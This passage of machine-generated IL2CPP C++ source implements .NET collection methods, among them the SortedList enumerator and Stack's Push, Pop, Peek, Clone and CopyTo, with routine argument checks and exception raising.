Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralFAD66767010E09AA6ADD07FA89C43A7F43F44049, /*hidden argument*/NULL); InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1 * L_4 = (InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1 *)il2cpp_codegen_object_new(InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1_il2cpp_TypeInfo_var); InvalidOperationException__ctor_m72027D5F1D513C25C05137E203EEED8FD8297706(L_4, L_3, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_4, NULL, SortedListEnumerator_get_Value_mA1FF92895EE42234163A72D61DA3D6CF6C642C14_RuntimeMethod_var); } IL_0023: { bool L_5 = __this->get_current_7(); if (L_5) { goto IL_003b; } } { String_t* L_6 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral4B7A2452FBAAF02487F5667BCA2E7D64B9707EDC, /*hidden argument*/NULL); InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1 * L_7 = (InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1 *)il2cpp_codegen_object_new(InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1_il2cpp_TypeInfo_var); InvalidOperationException__ctor_m72027D5F1D513C25C05137E203EEED8FD8297706(L_7, L_6, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_7, NULL, SortedListEnumerator_get_Value_mA1FF92895EE42234163A72D61DA3D6CF6C642C14_RuntimeMethod_var); } IL_003b: { RuntimeObject * L_8 = __this->get_value_2(); return L_8; } } // System.Void System.Collections.SortedList/SortedListEnumerator::Reset() extern "C" IL2CPP_METHOD_ATTR void SortedListEnumerator_Reset_mA0ACBEBFF0955F4BF3B6CA08C028361AE993C1A4 (SortedListEnumerator_t0B3C08255F72412FF007E1CEBA45EEFAED17443E * __this, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (SortedListEnumerator_Reset_mA0ACBEBFF0955F4BF3B6CA08C028361AE993C1A4_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int32_t L_0 = __this->get_version_6(); SortedList_tC8B7CDE75652EC657C510034F127B9DFDE16BF4E * L_1 = __this->get_sortedList_0(); int32_t L_2 = L_1->get_version_3(); if ((((int32_t)L_0) == ((int32_t)L_2))) { goto IL_0023; } } { String_t* L_3 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralFAD66767010E09AA6ADD07FA89C43A7F43F44049, /*hidden argument*/NULL); InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1 * L_4 = (InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1 *)il2cpp_codegen_object_new(InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1_il2cpp_TypeInfo_var); InvalidOperationException__ctor_m72027D5F1D513C25C05137E203EEED8FD8297706(L_4, L_3, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_4, NULL, SortedListEnumerator_Reset_mA0ACBEBFF0955F4BF3B6CA08C028361AE993C1A4_RuntimeMethod_var); } IL_0023: { int32_t L_5 = __this->get_startIndex_4(); __this->set_index_3(L_5); __this->set_current_7((bool)0); __this->set_key_1(NULL); __this->set_value_2(NULL); return; } } #ifdef __clang__ #pragma clang diagnostic pop #endif #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Void System.Collections.Stack::.ctor() extern "C" IL2CPP_METHOD_ATTR void Stack__ctor_m98F99FFBF373762F139506711349267D5354FE08 (Stack_t37723B68CC4FFD95F0F3D06A5D42D7DEE7569643 * __this, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Stack__ctor_m98F99FFBF373762F139506711349267D5354FE08_MetadataUsageId); s_Il2CppMethodInitialized = true; } { Object__ctor_m925ECA5E85CA100E3FB86A4F9E15C120E9A184C0(__this, /*hidden argument*/NULL); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_0 = (ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A*)SZArrayNew(ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A_il2cpp_TypeInfo_var, (uint32_t)((int32_t)10)); __this->set__array_0(L_0); __this->set__size_1(0); __this->set__version_2(0); return; } } // System.Void System.Collections.Stack::.ctor(System.Int32) extern "C" IL2CPP_METHOD_ATTR void Stack__ctor_mAA16105AE32299FABCBCCB6D912C220816030193 (Stack_t37723B68CC4FFD95F0F3D06A5D42D7DEE7569643 * __this, int32_t ___initialCapacity0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Stack__ctor_mAA16105AE32299FABCBCCB6D912C220816030193_MetadataUsageId); s_Il2CppMethodInitialized = true; } { Object__ctor_m925ECA5E85CA100E3FB86A4F9E15C120E9A184C0(__this, /*hidden argument*/NULL); int32_t L_0 = ___initialCapacity0; if ((((int32_t)L_0) >= ((int32_t)0))) { goto IL_001f; } } { String_t* L_1 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral314A883D61C1D386E61BE443EB9D3B50BA3FF07D, /*hidden argument*/NULL); ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA * L_2 = (ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA *)il2cpp_codegen_object_new(ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA_il2cpp_TypeInfo_var); ArgumentOutOfRangeException__ctor_m300CE4D04A068C209FD858101AC361C1B600B5AE(L_2, _stringLiteral4C28A7D98B2E79E88DB5793B92CAC2973807E234, L_1, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_2, NULL, Stack__ctor_mAA16105AE32299FABCBCCB6D912C220816030193_RuntimeMethod_var); } IL_001f: { int32_t L_3 = ___initialCapacity0; if ((((int32_t)L_3) >= ((int32_t)((int32_t)10)))) { goto IL_0028; } } { ___initialCapacity0 = ((int32_t)10); } IL_0028: { int32_t L_4 = ___initialCapacity0; ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_5 = (ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A*)SZArrayNew(ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A_il2cpp_TypeInfo_var, (uint32_t)L_4); __this->set__array_0(L_5); __this->set__size_1(0); __this->set__version_2(0); return; } } // System.Int32 System.Collections.Stack::get_Count() extern "C" IL2CPP_METHOD_ATTR int32_t Stack_get_Count_mA3966F522AE357ACCE3537FBDF82A919B509D6C0 (Stack_t37723B68CC4FFD95F0F3D06A5D42D7DEE7569643 * __this, const RuntimeMethod* method) { { int32_t L_0 = __this->get__size_1(); return L_0; } } // System.Boolean System.Collections.Stack::get_IsSynchronized() extern "C" IL2CPP_METHOD_ATTR bool Stack_get_IsSynchronized_m1DE2ABB7B9C97434B1AAC9B51D069F32AD3B0A65 (Stack_t37723B68CC4FFD95F0F3D06A5D42D7DEE7569643 * __this, const RuntimeMethod* method) { { return (bool)0; } } // System.Object System.Collections.Stack::get_SyncRoot() extern "C" IL2CPP_METHOD_ATTR RuntimeObject * Stack_get_SyncRoot_mD2CA98A101E2F7EF48457FA8496700E438054EB6 (Stack_t37723B68CC4FFD95F0F3D06A5D42D7DEE7569643 * __this, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Stack_get_SyncRoot_mD2CA98A101E2F7EF48457FA8496700E438054EB6_MetadataUsageId); s_Il2CppMethodInitialized = true; } { RuntimeObject * L_0 = __this->get__syncRoot_3(); if (L_0) { goto IL_001a; } } { RuntimeObject ** L_1 = __this->get_address_of__syncRoot_3(); RuntimeObject * L_2 = (RuntimeObject *)il2cpp_codegen_object_new(RuntimeObject_il2cpp_TypeInfo_var); Object__ctor_m925ECA5E85CA100E3FB86A4F9E15C120E9A184C0(L_2, /*hidden argument*/NULL); InterlockedCompareExchangeImpl<RuntimeObject *>((RuntimeObject **)L_1, L_2, NULL); } IL_001a: { RuntimeObject * L_3 = __this->get__syncRoot_3(); return L_3; } } // System.Void System.Collections.Stack::Clear() extern "C" IL2CPP_METHOD_ATTR void Stack_Clear_m9B8C5F26A38E15BD96ADFA5D3DF38227BDD91041 (Stack_t37723B68CC4FFD95F0F3D06A5D42D7DEE7569643 * __this, const RuntimeMethod* method) { { ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_0 = __this->get__array_0(); int32_t L_1 = __this->get__size_1(); Array_Clear_m174F4957D6DEDB6359835123005304B14E79132E((RuntimeArray *)(RuntimeArray *)L_0, 0, L_1, /*hidden argument*/NULL); __this->set__size_1(0); int32_t L_2 = __this->get__version_2(); __this->set__version_2(((int32_t)il2cpp_codegen_add((int32_t)L_2, (int32_t)1))); return; } } // System.Object System.Collections.Stack::Clone() extern "C" IL2CPP_METHOD_ATTR RuntimeObject * Stack_Clone_m970E7DDDA2100E11F01BF22FDC51B59A0058BB65 (Stack_t37723B68CC4FFD95F0F3D06A5D42D7DEE7569643 * __this, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Stack_Clone_m970E7DDDA2100E11F01BF22FDC51B59A0058BB65_MetadataUsageId); s_Il2CppMethodInitialized = true; } Stack_t37723B68CC4FFD95F0F3D06A5D42D7DEE7569643 * V_0 = NULL; { int32_t L_0 = __this->get__size_1(); Stack_t37723B68CC4FFD95F0F3D06A5D42D7DEE7569643 * L_1 = (Stack_t37723B68CC4FFD95F0F3D06A5D42D7DEE7569643 *)il2cpp_codegen_object_new(Stack_t37723B68CC4FFD95F0F3D06A5D42D7DEE7569643_il2cpp_TypeInfo_var); Stack__ctor_mAA16105AE32299FABCBCCB6D912C220816030193(L_1, L_0, /*hidden argument*/NULL); V_0 = L_1; Stack_t37723B68CC4FFD95F0F3D06A5D42D7DEE7569643 * L_2 = V_0; int32_t L_3 = __this->get__size_1(); L_2->set__size_1(L_3); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_4 = __this->get__array_0(); Stack_t37723B68CC4FFD95F0F3D06A5D42D7DEE7569643 * L_5 = V_0; ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_6 = L_5->get__array_0(); int32_t L_7 = __this->get__size_1(); Array_Copy_mA10D079DD8D9700CA44721A219A934A2397653F6((RuntimeArray *)(RuntimeArray *)L_4, 0, (RuntimeArray *)(RuntimeArray *)L_6, 0, L_7, /*hidden argument*/NULL); Stack_t37723B68CC4FFD95F0F3D06A5D42D7DEE7569643 * L_8 = V_0; int32_t L_9 = __this->get__version_2(); L_8->set__version_2(L_9); Stack_t37723B68CC4FFD95F0F3D06A5D42D7DEE7569643 * L_10 = V_0; return L_10; } } // System.Void System.Collections.Stack::CopyTo(System.Array,System.Int32) extern "C" IL2CPP_METHOD_ATTR void Stack_CopyTo_mFE62429D1F2E385D31D8AFEE165327B33628BDF4 (Stack_t37723B68CC4FFD95F0F3D06A5D42D7DEE7569643 * __this, RuntimeArray * ___array0, int32_t ___index1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Stack_CopyTo_mFE62429D1F2E385D31D8AFEE165327B33628BDF4_MetadataUsageId); s_Il2CppMethodInitialized = true; } int32_t V_0 = 0; ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* V_1 = NULL; { RuntimeArray * L_0 = ___array0; if (L_0) { goto IL_000e; } } { ArgumentNullException_t581DF992B1F3E0EC6EFB30CC5DC43519A79B27AD * L_1 = (ArgumentNullException_t581DF992B1F3E0EC6EFB30CC5DC43519A79B27AD *)il2cpp_codegen_object_new(ArgumentNullException_t581DF992B1F3E0EC6EFB30CC5DC43519A79B27AD_il2cpp_TypeInfo_var); ArgumentNullException__ctor_mEE0C0D6FCB2D08CD7967DBB1329A0854BBED49ED(L_1, _stringLiteral19EDC1210777BA4D45049C29280D9CC5E1064C25, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_1, NULL, Stack_CopyTo_mFE62429D1F2E385D31D8AFEE165327B33628BDF4_RuntimeMethod_var); } IL_000e: { RuntimeArray * L_2 = ___array0; int32_t L_3 = Array_get_Rank_m38145B59D67D75F9896A3F8CDA9B966641AE99E1(L_2, /*hidden argument*/NULL); if ((((int32_t)L_3) == ((int32_t)1))) { goto IL_0027; } } { String_t* L_4 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral2D77BE6D598A0A9376398980E66D10E319F1B52A, /*hidden argument*/NULL); ArgumentException_tEDCD16F20A09ECE461C3DA766C16EDA8864057D1 * L_5 = (ArgumentException_tEDCD16F20A09ECE461C3DA766C16EDA8864057D1 *)il2cpp_codegen_object_new(ArgumentException_tEDCD16F20A09ECE461C3DA766C16EDA8864057D1_il2cpp_TypeInfo_var); ArgumentException__ctor_m9A85EF7FEFEC21DDD525A67E831D77278E5165B7(L_5, L_4, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_5, NULL, Stack_CopyTo_mFE62429D1F2E385D31D8AFEE165327B33628BDF4_RuntimeMethod_var); } IL_0027: { int32_t L_6 = ___index1; if ((((int32_t)L_6) >= ((int32_t)0))) { goto IL_0040; } } { String_t* L_7 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral314A883D61C1D386E61BE443EB9D3B50BA3FF07D, /*hidden argument*/NULL); ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA * L_8 = (ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA *)il2cpp_codegen_object_new(ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA_il2cpp_TypeInfo_var); ArgumentOutOfRangeException__ctor_m300CE4D04A068C209FD858101AC361C1B600B5AE(L_8, _stringLiteralE540CDD1328B2B21E29A95405C301B9313B7C346, L_7, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_8, NULL, Stack_CopyTo_mFE62429D1F2E385D31D8AFEE165327B33628BDF4_RuntimeMethod_var); } IL_0040: { RuntimeArray * L_9 = ___array0; int32_t L_10 = Array_get_Length_m2239B6393651C3F4631D900EFC1B05DBE8F5466D(L_9, /*hidden argument*/NULL); int32_t L_11 = ___index1; int32_t L_12 = __this->get__size_1(); if ((((int32_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_10, (int32_t)L_11))) >= ((int32_t)L_12))) { goto IL_0060; } } { String_t* L_13 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral063F5BA07B9A8319201C127A47193BF92C67599A, /*hidden argument*/NULL); ArgumentException_tEDCD16F20A09ECE461C3DA766C16EDA8864057D1 * L_14 = (ArgumentException_tEDCD16F20A09ECE461C3DA766C16EDA8864057D1 *)il2cpp_codegen_object_new(ArgumentException_tEDCD16F20A09ECE461C3DA766C16EDA8864057D1_il2cpp_TypeInfo_var); ArgumentException__ctor_m9A85EF7FEFEC21DDD525A67E831D77278E5165B7(L_14, L_13, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_14, NULL, Stack_CopyTo_mFE62429D1F2E385D31D8AFEE165327B33628BDF4_RuntimeMethod_var); } IL_0060: { V_0 = 0; RuntimeArray * L_15 = ___array0; if (!((ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A*)IsInst((RuntimeObject*)L_15, ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A_il2cpp_TypeInfo_var))) { goto IL_00b5; } } { RuntimeArray * L_16 = ___array0; V_1 = ((ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A*)Castclass((RuntimeObject*)L_16, ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A_il2cpp_TypeInfo_var)); goto IL_008d; } IL_0073: { ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_17 = V_1; int32_t L_18 = V_0; int32_t L_19 = ___index1; ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_20 = __this->get__array_0(); int32_t L_21 = __this->get__size_1(); int32_t L_22 = V_0; int32_t L_23 = ((int32_t)il2cpp_codegen_subtract((int32_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_21, (int32_t)L_22)), (int32_t)1)); RuntimeObject * L_24 = (L_20)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_23)); ArrayElementTypeCheck (L_17, L_24); (L_17)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(((int32_t)il2cpp_codegen_add((int32_t)L_18, (int32_t)L_19))), (RuntimeObject *)L_24); int32_t L_25 = V_0; V_0 = ((int32_t)il2cpp_codegen_add((int32_t)L_25, (int32_t)1)); } IL_008d: { int32_t L_26 = V_0; int32_t L_27 = __this->get__size_1(); if ((((int32_t)L_26) < ((int32_t)L_27))) { goto IL_0073; } } { return; } IL_0097: { RuntimeArray * L_28 = ___array0; ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_29 = __this->get__array_0(); int32_t L_30 = __this->get__size_1(); int32_t L_31 = V_0; int32_t L_32 = ((int32_t)il2cpp_codegen_subtract((int32_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_30, (int32_t)L_31)), (int32_t)1)); RuntimeObject * L_33 = (L_29)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_32)); int32_t L_34 = V_0; int32_t L_35 = ___index1; Array_SetValue_m3C6811CE9C45D1E461404B5D2FBD4EC1A054FDCA(L_28, L_33, ((int32_t)il2cpp_codegen_add((int32_t)L_34, (int32_t)L_35)), /*hidden argument*/NULL); int32_t L_36 = V_0; V_0 = ((int32_t)il2cpp_codegen_add((int32_t)L_36, (int32_t)1)); } IL_00b5: { int32_t L_37 = V_0; int32_t L_38 = __this->get__size_1(); if ((((int32_t)L_37) < ((int32_t)L_38))) { goto IL_0097; } } { return; } } // System.Collections.IEnumerator System.Collections.Stack::GetEnumerator() extern "C" IL2CPP_METHOD_ATTR RuntimeObject* Stack_GetEnumerator_m58A7F61531021CA2F3BF52854236229EB85F6E92 (Stack_t37723B68CC4FFD95F0F3D06A5D42D7DEE7569643 * __this, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Stack_GetEnumerator_m58A7F61531021CA2F3BF52854236229EB85F6E92_MetadataUsageId); s_Il2CppMethodInitialized = true; } { StackEnumerator_tAD5D58C2B92BF36AB7BEDF4405635CB160515DDA * L_0 = (StackEnumerator_tAD5D58C2B92BF36AB7BEDF4405635CB160515DDA *)il2cpp_codegen_object_new(StackEnumerator_tAD5D58C2B92BF36AB7BEDF4405635CB160515DDA_il2cpp_TypeInfo_var); StackEnumerator__ctor_m6F43FBDA48F989B725ADA7CCEC46900630B631F7(L_0, __this, /*hidden argument*/NULL); return L_0; } } // System.Object System.Collections.Stack::Peek() extern "C" IL2CPP_METHOD_ATTR RuntimeObject * Stack_Peek_mEAC45FC37790CF917154F27345E106C2EE38346C (Stack_t37723B68CC4FFD95F0F3D06A5D42D7DEE7569643 * __this, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Stack_Peek_mEAC45FC37790CF917154F27345E106C2EE38346C_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int32_t L_0 = __this->get__size_1(); if (L_0) { goto IL_0018; } } { String_t* L_1 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral2AE9006AA79BCA491D17932D2580DBE509CC1BD7, /*hidden argument*/NULL); InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1 * L_2 = (InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1 *)il2cpp_codegen_object_new(InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1_il2cpp_TypeInfo_var); InvalidOperationException__ctor_m72027D5F1D513C25C05137E203EEED8FD8297706(L_2, L_1, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_2, NULL, Stack_Peek_mEAC45FC37790CF917154F27345E106C2EE38346C_RuntimeMethod_var); } IL_0018: { ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_3 = __this->get__array_0(); int32_t L_4 = __this->get__size_1(); int32_t L_5 = ((int32_t)il2cpp_codegen_subtract((int32_t)L_4, (int32_t)1)); RuntimeObject * L_6 = (L_3)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_5)); return L_6; } } // System.Object System.Collections.Stack::Pop() extern "C" IL2CPP_METHOD_ATTR RuntimeObject * Stack_Pop_m5419FBFC126E7004A81612F90B8137C5629F7CDE (Stack_t37723B68CC4FFD95F0F3D06A5D42D7DEE7569643 * __this, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Stack_Pop_m5419FBFC126E7004A81612F90B8137C5629F7CDE_MetadataUsageId); s_Il2CppMethodInitialized = true; } int32_t V_0 = 0; { int32_t L_0 = __this->get__size_1(); if (L_0) { goto IL_0018; } } { String_t* L_1 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral2AE9006AA79BCA491D17932D2580DBE509CC1BD7, /*hidden argument*/NULL); InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1 * L_2 = (InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1 *)il2cpp_codegen_object_new(InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1_il2cpp_TypeInfo_var); InvalidOperationException__ctor_m72027D5F1D513C25C05137E203EEED8FD8297706(L_2, L_1, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_2, NULL, Stack_Pop_m5419FBFC126E7004A81612F90B8137C5629F7CDE_RuntimeMethod_var); } IL_0018: { int32_t L_3 = __this->get__version_2(); __this->set__version_2(((int32_t)il2cpp_codegen_add((int32_t)L_3, (int32_t)1))); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_4 = __this->get__array_0(); int32_t L_5 = __this->get__size_1(); V_0 = ((int32_t)il2cpp_codegen_subtract((int32_t)L_5, (int32_t)1)); int32_t L_6 = V_0; __this->set__size_1(L_6); int32_t L_7 = V_0; int32_t L_8 = L_7; RuntimeObject * L_9 = (L_4)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_8)); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_10 = __this->get__array_0(); int32_t L_11 = __this->get__size_1(); ArrayElementTypeCheck (L_10, NULL); (L_10)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(L_11), (RuntimeObject *)NULL); return L_9; } } // System.Void System.Collections.Stack::Push(System.Object) extern "C" IL2CPP_METHOD_ATTR void Stack_Push_m971376A29407806EA49448EBDF6DECCCE8AF6358 (Stack_t37723B68CC4FFD95F0F3D06A5D42D7DEE7569643 * __this, RuntimeObject * ___obj0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Stack_Push_m971376A29407806EA49448EBDF6DECCCE8AF6358_MetadataUsageId); s_Il2CppMethodInitialized = true; } ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* V_0 = NULL; int32_t V_1 = 0; { int32_t L_0 = __this->get__size_1(); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_1 = __this->get__array_0(); if ((!(((uint32_t)L_0) == ((uint32_t)(((int32_t)((int32_t)(((RuntimeArray *)L_1)->max_length)))))))) { goto IL_003b; } } { ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_2 = __this->get__array_0(); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_3 = (ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A*)SZArrayNew(ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A_il2cpp_TypeInfo_var, (uint32_t)((int32_t)il2cpp_codegen_multiply((int32_t)2, (int32_t)(((int32_t)((int32_t)(((RuntimeArray *)L_2)->max_length))))))); V_0 = L_3; ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_4 = __this->get__array_0(); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_5 = V_0; int32_t L_6 = __this->get__size_1(); Array_Copy_mA10D079DD8D9700CA44721A219A934A2397653F6((RuntimeArray *)(RuntimeArray *)L_4, 0, (RuntimeArray *)(RuntimeArray *)L_5, 0, L_6, /*hidden argument*/NULL); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_7 = V_0; __this->set__array_0(L_7); } IL_003b: { ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_8 = __this->get__array_0(); int32_t L_9 = __this->get__size_1(); V_1 = L_9; int32_t L_10 = V_1; __this->set__size_1(((int32_t)il2cpp_codegen_add((int32_t)L_10, (int32_t)1))); int32_t L_11 = V_1; RuntimeObject * L_12 = ___obj0; ArrayElementTypeCheck (L_8, L_12); (L_8)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(L_11), (RuntimeObject *)L_12); int32_t L_13 = __this->get__version_2(); __this->set__version_2(((int32_t)il2cpp_codegen_add((int32_t)L_13, (int32_t)1))); return; } } #ifdef __clang__ #pragma clang diagnostic pop #endif #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif #ifdef __clang__ #pragma clang diagnostic pop #endif #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Void System.Collections.Stack/StackEnumerator::.ctor(System.Collections.Stack) extern "C" IL2CPP_METHOD_ATTR void StackEnumerator__ctor_m6F43FBDA48F989B725ADA7CCEC46900630B631F7 (StackEnumerator_tAD5D58C2B92BF36AB7BEDF4405635CB160515DDA * __this, Stack_t37723B68CC4FFD95F0F3D06A5D42D7DEE7569643 * ___stack0, const RuntimeMethod* method) { { Object__ctor_m925ECA5E85CA100E3FB86A4F9E15C120E9A184C0(__this, /*hidden argument*/NULL); Stack_t37723B68CC4FFD95F0F3D06A5D42D7DEE7569643 * L_0 = ___stack0; __this->set__stack_0(L_0); Stack_t37723B68CC4FFD95F0F3D06A5D42D7DEE7569643 * L_1 = __this->get__stack_0(); int32_t L_2 = L_1->get__version_2(); __this->set__version_2(L_2); __this->set__index_1(((int32_t)-2)); __this->set_currentElement_3(NULL); return; } } // System.Object System.Collections.Stack/StackEnumerator::Clone() extern "C" IL2CPP_METHOD_ATTR RuntimeObject * StackEnumerator_Clone_mA509B6C10DEE0D9D7BB94621F3A5311A49BDBD36 (StackEnumerator_tAD5D58C2B92BF36AB7BEDF4405635CB160515DDA * __this, const RuntimeMethod* method) { { RuntimeObject * L_0 = Object_MemberwiseClone_m1DAC4538CD68D4CF4DC5B04E4BBE86D470948B28(__this, /*hidden argument*/NULL); return L_0; } } // System.Boolean System.Collections.Stack/StackEnumerator::MoveNext() extern "C" IL2CPP_METHOD_ATTR bool StackEnumerator_MoveNext_m7C00619A440FB2C12C0A5C3C8CEB934250C3DE22 (StackEnumerator_tAD5D58C2B92BF36AB7BEDF4405635CB160515DDA * __this, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (StackEnumerator_MoveNext_m7C00619A440FB2C12C0A5C3C8CEB934250C3DE22_MetadataUsageId); s_Il2CppMethodInitialized = true; } int32_t V_0 = 0; int32_t G_B5_0 = 0; int32_t G_B4_0 = 0; int32_t G_B10_0 = 0; int32_t G_B9_0 = 0; { int32_t L_0 = __this->get__version_2(); Stack_t37723B68CC4FFD95F0F3D06A5D42D7DEE7569643 * L_1 = __this->get__stack_0(); int32_t L_2 = L_1->get__version_2(); if ((((int32_t)L_0) == ((int32_t)L_2))) { goto IL_0023; } } { String_t* L_3 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralFAD66767010E09AA6ADD07FA89C43A7F43F44049, /*hidden argument*/NULL); InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1 * L_4 = 